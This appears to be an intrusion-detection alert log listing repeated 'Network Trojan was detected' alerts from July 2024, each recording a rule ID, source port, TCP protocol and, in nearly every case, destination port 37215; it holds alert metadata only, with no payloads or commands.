                  Timestamp:07/10/24-08:26:34.191107
                  SID:2829579
                  Source Port:38094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.192710
                  SID:2835222
                  Source Port:57162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662130
                  SID:2829579
                  Source Port:50752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.759873
                  SID:2829579
                  Source Port:46020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876445
                  SID:2829579
                  Source Port:51892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2835222
                  Source Port:40882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.829336
                  SID:2829579
                  Source Port:52730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148886
                  SID:2835222
                  Source Port:37166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.643122
                  SID:2835222
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000595
                  SID:2835222
                  Source Port:44852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.288266
                  SID:2829579
                  Source Port:49966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778928
                  SID:2829579
                  Source Port:46954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.049112
                  SID:2829579
                  Source Port:36602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.597110
                  SID:2835222
                  Source Port:60222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.309217
                  SID:2829579
                  Source Port:51140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.843143
                  SID:2835222
                  Source Port:58522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.484442
                  SID:2829579
                  Source Port:33404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.665710
                  SID:2835222
                  Source Port:47094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339944
                  SID:2829579
                  Source Port:55198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.791726
                  SID:2835222
                  Source Port:39384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.729820
                  SID:2835222
                  Source Port:40104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.126457
                  SID:2829579
                  Source Port:43174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537934
                  SID:2835222
                  Source Port:32818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.569489
                  SID:2829579
                  Source Port:34222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.358336
                  SID:2835222
                  Source Port:39396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.862300
                  SID:2829579
                  Source Port:42104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.839757
                  SID:2829579
                  Source Port:57184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.825878
                  SID:2835222
                  Source Port:43756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.342086
                  SID:2829579
                  Source Port:56828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.825878
                  SID:2829579
                  Source Port:40952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881416
                  SID:2829579
                  Source Port:60208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481088
                  SID:2829579
                  Source Port:34094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.559919
                  SID:2835222
                  Source Port:47050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.071296
                  SID:2829579
                  Source Port:50778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.995601
                  SID:2829579
                  Source Port:40870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.993210
                  SID:2835222
                  Source Port:51830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.020440
                  SID:2835222
                  Source Port:42382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.197285
                  SID:2835222
                  Source Port:60460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.205499
                  SID:2835222
                  Source Port:38062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478024
                  SID:2829579
                  Source Port:33702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.007321
                  SID:2829579
                  Source Port:46172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.837917
                  SID:2835222
                  Source Port:58010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.848212
                  SID:2835222
                  Source Port:60922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.757983
                  SID:2835222
                  Source Port:41664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.290002
                  SID:2835222
                  Source Port:58666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.943853
                  SID:2829579
                  Source Port:52824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.666917
                  SID:2835222
                  Source Port:37094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.888787
                  SID:2829579
                  Source Port:46640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.209381
                  SID:2829579
                  Source Port:58764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.499089
                  SID:2829579
                  Source Port:48438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.668084
                  SID:2835222
                  Source Port:60586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853545
                  SID:2835222
                  Source Port:36378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.837178
                  SID:2835222
                  Source Port:60426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.651678
                  SID:2835222
                  Source Port:60518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514524
                  SID:2835222
                  Source Port:33164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.090396
                  SID:2835222
                  Source Port:49428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2835222
                  Source Port:49846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505741
                  SID:2835222
                  Source Port:40014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569394
                  SID:2835222
                  Source Port:43500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.563593
                  SID:2829579
                  Source Port:38856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.875122
                  SID:2835222
                  Source Port:45498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976669
                  SID:2829579
                  Source Port:46760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.051862
                  SID:2835222
                  Source Port:55748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.995673
                  SID:2829579
                  Source Port:53924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626418
                  SID:2829579
                  Source Port:53358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399682
                  SID:2829579
                  Source Port:59752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.716869
                  SID:2829579
                  Source Port:40066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.733035
                  SID:2829579
                  Source Port:46442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.826871
                  SID:2829579
                  Source Port:55462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.790586
                  SID:2829579
                  Source Port:58288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814573
                  SID:2829579
                  Source Port:45568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.938068
                  SID:2835222
                  Source Port:46358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.863444
                  SID:2829579
                  Source Port:56520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.125046
                  SID:2829579
                  Source Port:60074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437986
                  SID:2829579
                  Source Port:60208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.312291
                  SID:2829579
                  Source Port:37722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.150290
                  SID:2835222
                  Source Port:42408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853963
                  SID:2829579
                  Source Port:47084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.743404
                  SID:2829579
                  Source Port:48752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.920387
                  SID:2835222
                  Source Port:57348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.832820
                  SID:2829579
                  Source Port:39406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.074036
                  SID:2835222
                  Source Port:36170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.500582
                  SID:2835222
                  Source Port:40338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.910333
                  SID:2835222
                  Source Port:45524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.801759
                  SID:2829579
                  Source Port:59806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.921324
                  SID:2829579
                  Source Port:53346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.168710
                  SID:2829579
                  Source Port:43062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.486596
                  SID:2829579
                  Source Port:44356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651958
                  SID:2835222
                  Source Port:57538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448133
                  SID:2829579
                  Source Port:58774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.636567
                  SID:2835222
                  Source Port:48508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.527687
                  SID:2835222
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505030
                  SID:2835222
                  Source Port:34754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.864839
                  SID:2835222
                  Source Port:38428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.282247
                  SID:2829579
                  Source Port:39750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662909
                  SID:2835222
                  Source Port:42148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2835222
                  Source Port:56936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.557804
                  SID:2829579
                  Source Port:54614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399837
                  SID:2829579
                  Source Port:49472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.557053
                  SID:2829579
                  Source Port:52898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.176375
                  SID:2829579
                  Source Port:57640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078859
                  SID:2829579
                  Source Port:50544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.117680
                  SID:2835222
                  Source Port:52756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.918557
                  SID:2835222
                  Source Port:45606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.530695
                  SID:2835222
                  Source Port:55228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.826364
                  SID:2829579
                  Source Port:46922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.146093
                  SID:2835222
                  Source Port:48380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.974883
                  SID:2829579
                  Source Port:54774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.913704
                  SID:2829579
                  Source Port:46502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.845095
                  SID:2829579
                  Source Port:40352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339204
                  SID:2829579
                  Source Port:42018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.484683
                  SID:2835222
                  Source Port:35574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853963
                  SID:2829579
                  Source Port:39818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.190112
                  SID:2829579
                  Source Port:32846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.856939
                  SID:2835222
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.179489
                  SID:2829579
                  Source Port:59458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.212811
                  SID:2835222
                  Source Port:37068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.485057
                  SID:2835222
                  Source Port:54586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.630891
                  SID:2835222
                  Source Port:51512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.741388
                  SID:2835222
                  Source Port:38982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.184819
                  SID:2829579
                  Source Port:55796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.824141
                  SID:2829579
                  Source Port:38042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.838617
                  SID:2829579
                  Source Port:50850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.360120
                  SID:2829579
                  Source Port:58160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.381541
                  SID:2829579
                  Source Port:43304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.060126
                  SID:2835222
                  Source Port:39218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.182462
                  SID:2835222
                  Source Port:52668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.662636
                  SID:2030490
                  Source Port:51972
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.325591
                  SID:2835222
                  Source Port:46974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.516215
                  SID:2829579
                  Source Port:34616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.155522
                  SID:2829579
                  Source Port:48014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.895682
                  SID:2829579
                  Source Port:36642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2829579
                  Source Port:37782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.406759
                  SID:2835222
                  Source Port:40530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.614916
                  SID:2829579
                  Source Port:37002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.908970
                  SID:2835222
                  Source Port:36004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600322
                  SID:2829579
                  Source Port:49458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695229
                  SID:2829579
                  Source Port:36868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.153820
                  SID:2829579
                  Source Port:38100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767768
                  SID:2829579
                  Source Port:35388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177023
                  SID:2835222
                  Source Port:57430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.284059
                  SID:2829579
                  Source Port:57694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.286838
                  SID:2835222
                  Source Port:32954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.688834
                  SID:2835222
                  Source Port:36882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.928138
                  SID:2829579
                  Source Port:40892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.802068
                  SID:2829579
                  Source Port:54378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912225
                  SID:2835222
                  Source Port:47106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.389134
                  SID:2829579
                  Source Port:52278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.834879
                  SID:2829579
                  Source Port:55930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.619862
                  SID:2829579
                  Source Port:40402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.185789
                  SID:2829579
                  Source Port:52550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.841961
                  SID:2829579
                  Source Port:58750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.115496
                  SID:2829579
                  Source Port:34244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.432231
                  SID:2829579
                  Source Port:46580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.580487
                  SID:2829579
                  Source Port:39726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.544166
                  SID:2829579
                  Source Port:50622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.196604
                  SID:2829579
                  Source Port:51422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.864832
                  SID:2829579
                  Source Port:39194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.836491
                  SID:2835222
                  Source Port:53878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771211
                  SID:2829579
                  Source Port:40652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.728231
                  SID:2835222
                  Source Port:49306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.422305
                  SID:2829579
                  Source Port:46396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.864190
                  SID:2829579
                  Source Port:53112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.821479
                  SID:2835222
                  Source Port:55890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647061
                  SID:2829579
                  Source Port:60808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.197956
                  SID:2829579
                  Source Port:51918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885160
                  SID:2835222
                  Source Port:34728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2829579
                  Source Port:39222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.837705
                  SID:2835222
                  Source Port:36522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633431
                  SID:2835222
                  Source Port:48744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.515312
                  SID:2835222
                  Source Port:37966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.173422
                  SID:2829579
                  Source Port:51520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162880
                  SID:2835222
                  Source Port:57928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.558206
                  SID:2835222
                  Source Port:59100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392064
                  SID:2835222
                  Source Port:57044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.554316
                  SID:2829579
                  Source Port:42128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.901569
                  SID:2835222
                  Source Port:44818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.666714
                  SID:2829579
                  Source Port:36710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.168081
                  SID:2835222
                  Source Port:46176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.736673
                  SID:2835222
                  Source Port:34502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.856517
                  SID:2829579
                  Source Port:57552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.175136
                  SID:2829579
                  Source Port:32774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.011560
                  SID:2835222
                  Source Port:52186
                  Destination Port:37215
                  Protocol:TCP
